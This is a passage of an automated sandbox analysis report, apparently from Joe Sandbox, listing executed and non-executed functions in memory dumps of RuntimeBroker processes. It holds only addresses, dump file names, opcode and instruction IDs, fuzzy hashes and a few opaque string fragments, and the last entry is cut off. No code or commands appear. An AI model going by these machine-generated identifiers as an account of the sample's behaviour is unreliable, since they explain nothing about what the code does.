                                                      • Snapshot File: hcaresult_35_2_7ff848ec1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b1a834009d86bb552c936b9dde17b73332d2acb5b88f96118b2fe903ac281fd3
                                                      • Instruction ID: 5cf241c6699d63b31890b7e713000fe6ce51969f10b877fc55e8e66513d6d08d
                                                      • Opcode Fuzzy Hash: b1a834009d86bb552c936b9dde17b73332d2acb5b88f96118b2fe903ac281fd3
                                                      • Instruction Fuzzy Hash: 24E012359897C04FC70A573488658943FB0DF5721174640DBD045CB1B3D62D984DC752
                                                      Function 00007FF848EA5100 Relevance: .0, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848ea0000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a06b60985aa9db39ab0d5be490f14ce91fefdc09fba2be95d94fe4c2d1642b69
                                                      • Instruction ID: 320e4c3c42481596f69fcce9885e830150ddb27fc527fd4feba9d7183b12a376
                                                      • Opcode Fuzzy Hash: a06b60985aa9db39ab0d5be490f14ce91fefdc09fba2be95d94fe4c2d1642b69
                                                      • Instruction Fuzzy Hash: 4ED05E30B609094B8B0CB62D8459430B3D1F7AA2067D45278940BC6281ED25ECC68B84
                                                      Function 00007FF848ECA900 Relevance: .0, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848EC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EC1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848ec1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                      Function 00007FF848ECA870 Relevance: .0, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848EC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EC1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848ec1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                      Function 00007FF848E93824 Relevance: .0, Instructions: 21COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848e90000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dd0dd275d4e51df90db5c9e7dc2fb186f9d55b634055d79a0b6d1e815a684555
                                                      • Instruction ID: d0712fb9a3a27d196c041b1c78fe2ed482f18b66f23691b0113dcaa740ebb143
                                                      • Opcode Fuzzy Hash: dd0dd275d4e51df90db5c9e7dc2fb186f9d55b634055d79a0b6d1e815a684555
                                                      • Instruction Fuzzy Hash: B4E01A31E0C11A4FFB54F694C8517B962A1BF98388F5000B8D92ED36D3CFBC6D808A49
                                                      Function 00007FF848EC2290 Relevance: .0, Instructions: 18COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848EC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EC1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848ec1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                      • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                      • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                      • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                      Function 00007FF848EC71D0 Relevance: .0, Instructions: 17COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848EC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EC1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848ec1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3f85fd52fba64f279a4f3a6930ff2988cea1587b614e6e9b6eb59ce1dd6ca5eb
                                                      • Instruction ID: c044bdff601aae17b884129f8ef86706bd9fa0e65733d5f50da8e2906aae78a0
                                                      • Opcode Fuzzy Hash: 3f85fd52fba64f279a4f3a6930ff2988cea1587b614e6e9b6eb59ce1dd6ca5eb
                                                      • Instruction Fuzzy Hash: 46D01234B549054FC70CB63C8C99C747391EB6E216B9540A9D00AD73B1DA6ADC89C741
                                                      Function 00007FF848ECBB50 Relevance: .0, Instructions: 17COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848EC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EC1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848ec1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 68f8eb30df453edda37dc56eca5fbe8d0d3c4f9fcdc6587351046ae7d8bb2356
                                                      • Instruction ID: 02fc0984c0ab4a21e89fdddf64adba0ef40bb9012442e258478f03cad66e4650
                                                      • Opcode Fuzzy Hash: 68f8eb30df453edda37dc56eca5fbe8d0d3c4f9fcdc6587351046ae7d8bb2356
                                                      • Instruction Fuzzy Hash: 23D01234B549084FC70CB638985987473A1EB6E216B9540A9D00AC72B1DA6AEC89C741
                                                      Function 00007FF848E91953 Relevance: .0, Instructions: 13COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848e90000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b26f99bf9b240e8bb752c8e04caeaf08070b12d06cc54ab1ca5997cc23b04b38
                                                      • Instruction ID: 3c7774ded5dc6cddcd09bb4cb7cefecc00efe63494be3e60803b69e0328d2153
                                                      • Opcode Fuzzy Hash: b26f99bf9b240e8bb752c8e04caeaf08070b12d06cc54ab1ca5997cc23b04b38
                                                      • Instruction Fuzzy Hash: A5D05E21E1CA494EEB85B7F0841A2BD5292BF10354F8804B8D84E971C3CFBD34005A88
                                                      Function 00007FF848E906AD Relevance: .0, Instructions: 13COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848e90000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0f056a88d4526d4a05755b6429272dcde325ccc0fd39d39c3356d543093bbfa2
                                                      • Instruction ID: b8637e002c9e981cf58a50db7dd0400fca4ce7b093ae74931a6fd721af7db1d6
                                                      • Opcode Fuzzy Hash: 0f056a88d4526d4a05755b6429272dcde325ccc0fd39d39c3356d543093bbfa2
                                                      • Instruction Fuzzy Hash: 38C08C02D0F52B08E44031EF24020ACA1007FC4AACFD00032C50C40082AFED20D5014E
                                                      Function 00007FF848E9559A Relevance: .0, Instructions: 12COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848e90000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 86b4d57d277300af1bb407b1db35b0ccb04d8e894e64b2ce4cdfe60b85970ed7
                                                      • Instruction ID: f887e971c3a1ef3c90fb715d6d24ab0a4061c84229743e4734dd675adbf10a04
                                                      • Opcode Fuzzy Hash: 86b4d57d277300af1bb407b1db35b0ccb04d8e894e64b2ce4cdfe60b85970ed7
                                                      • Instruction Fuzzy Hash: FBD0C966C1D523CFFAB130D048241B90245BB903BDF694772D82E3A1C29FFDBD51861A
                                                      Function 00007FF848E912D8 Relevance: .0, Instructions: 12COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848e90000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3434e4c200470a55205a769e0bdb57b0bd16550e86ef3948b0a85cc92d65b229
                                                      • Instruction ID: 5873d979e4127eabfa8ba6f9c0aa9d6ff0598408284057d1cc9789fef242b04c
                                                      • Opcode Fuzzy Hash: 3434e4c200470a55205a769e0bdb57b0bd16550e86ef3948b0a85cc92d65b229
                                                      • Instruction Fuzzy Hash: 41C08C305148088FC908FB29C88480437A0FF09204BC20090E008C7171D269DCC0C740
                                                      Function 00007FF848E94E07 Relevance: .0, Instructions: 10COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848e90000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a0558d24f9de06d56be683147cce61603295d2530bc41510556962deaf7ad918
                                                      • Instruction ID: 9daf91d2eaeaf9f0c452d908e1f1815e675b1c903818958196b8c0a00746d127
                                                      • Opcode Fuzzy Hash: a0558d24f9de06d56be683147cce61603295d2530bc41510556962deaf7ad918
                                                      • Instruction Fuzzy Hash: F7C08C02E0EC1A9AE25A220440221BE44429F80788F4400B5E00F863CAEF0C1E0142CA
                                                      Function 00007FF848E906D0 Relevance: .0, Instructions: 8COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848e90000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a78a74dc4bf2f834ffd4e85e6ada64bb77668f280636e538a7a23ceeaa807a1d
                                                      • Instruction ID: 8c79e3898800fdb711297317867d8e852c3a97d4dfb126889a3967a440f68eea
                                                      • Opcode Fuzzy Hash: a78a74dc4bf2f834ffd4e85e6ada64bb77668f280636e538a7a23ceeaa807a1d
                                                      • Instruction Fuzzy Hash: 9CB00205C5E45F05E45431FB19460A974507FC555CFD51170D80D50185A9DD1595125A

                                                      Non-executed Functions

                                                      Function 00007FF848E909B0 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848e90000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: c9$!k9$"s9$#{9
                                                      • API String ID: 0-1692736845
                                                      • Opcode ID: 0edf5382342b5c7c991cac7bfef69dcd1410d9caf6c62a3a0452b474a5a2f4c4
                                                      • Instruction ID: 677935ebcababdf093b0807f4e5c51e0347660e4735a7befde72b6a073c3378f
                                                      • Opcode Fuzzy Hash: 0edf5382342b5c7c991cac7bfef69dcd1410d9caf6c62a3a0452b474a5a2f4c4
                                                      • Instruction Fuzzy Hash: FE517CD6ACA9623DE11E36FDB4020F96B44EF813B9F4C9677E04C890934E59608686FD

                                                      Executed Functions

                                                      Function 00007FF848E80D48 Relevance: 2.8, Strings: 2, Instructions: 254COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e80000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 5Y_H$<M_^
                                                      • API String ID: 0-383103648
                                                      • Opcode ID: 8a7342dcf4c098a58c7805a85c435de2e2e817b518bdd82d87d3adf2d52599e3
                                                      • Instruction ID: ca8f82df7599fec23cd1f7e2be09df268255ed9162fea6931537339b0522c195
                                                      • Opcode Fuzzy Hash: 8a7342dcf4c098a58c7805a85c435de2e2e817b518bdd82d87d3adf2d52599e3
                                                      • Instruction Fuzzy Hash: C891EE70D1DA8D9FE789EB2888693B97FE1FB96364F4401BAC009E72D2DB791804C715
                                                      Function 00007FF848E912B2 Relevance: .8, Instructions: 775COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e90000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4f063caf71b4f0eb2c644563362152ae8ad1b0304d7ea9f7d7d2f6410bbe9013
                                                      • Instruction ID: b1e67de12b94ea2c1501164d9a0e75838c561839a353e0918f5d1896e583c08e
                                                      • Opcode Fuzzy Hash: 4f063caf71b4f0eb2c644563362152ae8ad1b0304d7ea9f7d7d2f6410bbe9013
                                                      • Instruction Fuzzy Hash: 9832A221E1CD5A9FEA98FA6884556B873E2FF98784F5441B9C00DC3287DF3DAC428785
                                                      Function 00007FF848E80E43 Relevance: .2, Instructions: 170COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e80000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cce0fe3eda5d19e0684b807a57dff918f2b321a32060f704ba9ec9488a0d563f
                                                      • Instruction ID: 2e1f5d7d522c3f526ed5767e32d97b946fd7efa9e261ac83f5c94f8c18ee05fe
                                                      • Opcode Fuzzy Hash: cce0fe3eda5d19e0684b807a57dff918f2b321a32060f704ba9ec9488a0d563f
                                                      • Instruction Fuzzy Hash: 5551C271E18A5D8EE398EB1898597B97FE1FB86369F4002BEC009E37D2DBB91411C714
                                                      Function 00007FF848EB38ED Relevance: 1.5, Strings: 1, Instructions: 280COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848eb1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I_H
                                                      • API String ID: 0-288374528
                                                      • Opcode ID: 9cc919025bec79329b757c97f0b98042756b51d6c34ea7b51a08a62522e990f1
                                                      • Instruction ID: a3ae143777e87e3f3dd58f1a250c6bd28027d4c205379c0788360410ae4222bc
                                                      • Opcode Fuzzy Hash: 9cc919025bec79329b757c97f0b98042756b51d6c34ea7b51a08a62522e990f1
                                                      • Instruction Fuzzy Hash: 9A81A131E1C94A5FEA98FA2C88562B577D2FFA8791F0441B9D40DC32C7DE7CA8418789
                                                      Function 00007FF848EB3943 Relevance: 1.5, Strings: 1, Instructions: 217COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848eb1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I_H
                                                      • API String ID: 0-288374528
                                                      • Opcode ID: a01936f15079cbfd505f2464719f0b2b27f1a7b4741bc0df462171dd61a8c46c
                                                      • Instruction ID: 872f108559f6b0da9ebfdedc56ff00a59c9141cc16d5b2c599f14172d267b99b
                                                      • Opcode Fuzzy Hash: a01936f15079cbfd505f2464719f0b2b27f1a7b4741bc0df462171dd61a8c46c
                                                      • Instruction Fuzzy Hash: 82518F21E1C95A5FEB98FA2C84563B573D2FFA4791F4481B9D40EC3287DE3CA8418385
                                                      Function 00007FF848EBA8E9 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848eb1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: M
                                                      • API String ID: 0-3664761504
                                                      • Opcode ID: af62d64c9eea5667c441b423537b2437a84c908086ff5a8e99bf5604b8924664
                                                      • Instruction ID: 9bc60aab2d95d71ba3516f50865908653f7a6e85a339ffa963ee6dbb17b3229c
                                                      • Opcode Fuzzy Hash: af62d64c9eea5667c441b423537b2437a84c908086ff5a8e99bf5604b8924664
                                                      • Instruction Fuzzy Hash: CBF06D7190E7C48FCB1AEA3488694547FA0EF6720174A46EEC085CF1A3EA2DCC89CB11
                                                      Function 00007FF848EBA859 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848eb1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: M
                                                      • API String ID: 0-3664761504
                                                      • Opcode ID: c14079f909465edeacc4e4ac41ab61fc6129e76ed6af58be8bfd6d9e3434686b
                                                      • Instruction ID: 25fad13e3738dcfd67e17979f3d9864b2ea717ffd0f090844797d40fe1b96cf2
                                                      • Opcode Fuzzy Hash: c14079f909465edeacc4e4ac41ab61fc6129e76ed6af58be8bfd6d9e3434686b
                                                      • Instruction Fuzzy Hash: 40F06D7190E7C48FDB1AEB7888698557FA0EF6720174A42EFC045CF1A3EA2DC889C701
                                                      Function 00007FF848E93A89 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e90000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: 05f981d2bdfbb70e16728106f6da44c75e12cce0a70ce9b067860316278d5ea0
                                                      • Instruction ID: 22e0f9b84c8e0976449a7ffc22ad5a6e90d7b32a7d76d0ad7e176be99a9c2356
                                                      • Opcode Fuzzy Hash: 05f981d2bdfbb70e16728106f6da44c75e12cce0a70ce9b067860316278d5ea0
                                                      • Instruction Fuzzy Hash: 8BE01A7194E7C44FCB0AEA74887A8543FA0EE6B25178A40EEC045CF1B3E66DC84AC701
                                                      Function 00007FF848EBADE9 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848eb1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: 1c3f5f7381fda12de9fd3b56ca3b5b258e950b3deb9177c500fe15ad4dde55b0
                                                      • Instruction ID: fab309a02eb38c18ccbe73b8a32d64f6c988185e2e3e8dcfb88004a3f5813fd3
                                                      • Opcode Fuzzy Hash: 1c3f5f7381fda12de9fd3b56ca3b5b258e950b3deb9177c500fe15ad4dde55b0
                                                      • Instruction Fuzzy Hash: CAE0487144E7D44FCB06EB3484698553F60EF6721578A40EEC045CF1B3E62D988AC701
                                                      Function 00007FF848EB2279 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848eb1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: 3a1ee097e8447e0de5faaae1d02f8aabf37f0114f9ac78b61e4219991670ecbc
                                                      • Instruction ID: 1f3aab2526cadab3994b5b12a911b89d2b7f9689e191491a9806ec64aeeabe8d
                                                      • Opcode Fuzzy Hash: 3a1ee097e8447e0de5faaae1d02f8aabf37f0114f9ac78b61e4219991670ecbc
                                                      • Instruction Fuzzy Hash: 49E01A7184E7C48FCB4AEB74886A9543FA0EE6B21178A40EEC045CF1B3E62D8849C701
                                                      Function 00007FF848E91349 Relevance: .5, Instructions: 535COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e90000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6046c6e4776b9c72707c20de9e8fb80ac4d5b5da1bdda560fe03be9c83ff8afc
                                                      • Instruction ID: e410a45d482733f282a8568af36b76f0cce1aba48ad000c16f0b6bf12e9b52a3
                                                      • Opcode Fuzzy Hash: 6046c6e4776b9c72707c20de9e8fb80ac4d5b5da1bdda560fe03be9c83ff8afc
                                                      • Instruction Fuzzy Hash: 1B026D31E1C95A9FEB98FA6884516B873E1FF58784F5441B9D00DD3287CF3DA8828B45
                                                      Function 00007FF848E808D0 Relevance: .1, Instructions: 137COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e80000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: aeae343dffb8baa8882341ee1091c3823af7392ef8c6c2af71c60ad31732db1f
                                                      • Instruction ID: d5f4b2a876564efdb83488b5074536e18efe2af13f6bfe376fdc04d3d0a741b6
                                                      • Opcode Fuzzy Hash: aeae343dffb8baa8882341ee1091c3823af7392ef8c6c2af71c60ad31732db1f
                                                      • Instruction Fuzzy Hash: 85416852A4E9652EE709B77CA0992FC7B80EF453A5F1841BBD04CC71D3DE28A8818699
                                                      Function 00007FF848E80998 Relevance: .1, Instructions: 124COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e80000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 08c3238b3ddf729b6958ad25dc33deaab8cb7dce8da41409eccda3c0ba58aa5d
                                                      • Instruction ID: 54422113e45d363d264bdf9feff957ef817aeedb23b2a7faaf80fcc629b7b216
                                                      • Opcode Fuzzy Hash: 08c3238b3ddf729b6958ad25dc33deaab8cb7dce8da41409eccda3c0ba58aa5d
                                                      • Instruction Fuzzy Hash: 4131F020B1D9595FEA98F63C944A67C76C2FF98755F8000B9E40EC32E7EE2CA8818645
                                                      Function 00007FF848E81171 Relevance: .1, Instructions: 96COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e80000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3e2f95037095dc13f6620f3fa1962d80c16fb65d9211c18d3eaf51f23a5e70a4
                                                      • Instruction ID: 9f41dd0a5a708b134b73fda37964427c8655bdb07c7258f19bb1bfc706d79194
                                                      • Opcode Fuzzy Hash: 3e2f95037095dc13f6620f3fa1962d80c16fb65d9211c18d3eaf51f23a5e70a4
                                                      • Instruction Fuzzy Hash: D6316D3190D68A8FDB46EB68C8659AD7BF1FF26340F4805BAC009D72A3DB39A844C751
                                                      Function 00007FF848EB2979 Relevance: .1, Instructions: 93COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848eb1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2cd395db07b556c4f38908b81630f30f3124ebfc3977b518b1f835076b2356ce
                                                      • Instruction ID: 5348031c1677b2b3e974a2c1ca4ec6a60888d7beca9be50b03b0f686e16a44fa
                                                      • Opcode Fuzzy Hash: 2cd395db07b556c4f38908b81630f30f3124ebfc3977b518b1f835076b2356ce
                                                      • Instruction Fuzzy Hash: CA317331E1C94A8FEB55EA18C4956B873E2FFA8754F044279C00ED72C7DE78A8418785
                                                      Function 00007FF848E80960 Relevance: .1, Instructions: 91COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e80000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5f31bb4765589e3bbf43aa4dab1083cb116eca122b6a36b9e55ecebfa93abe14
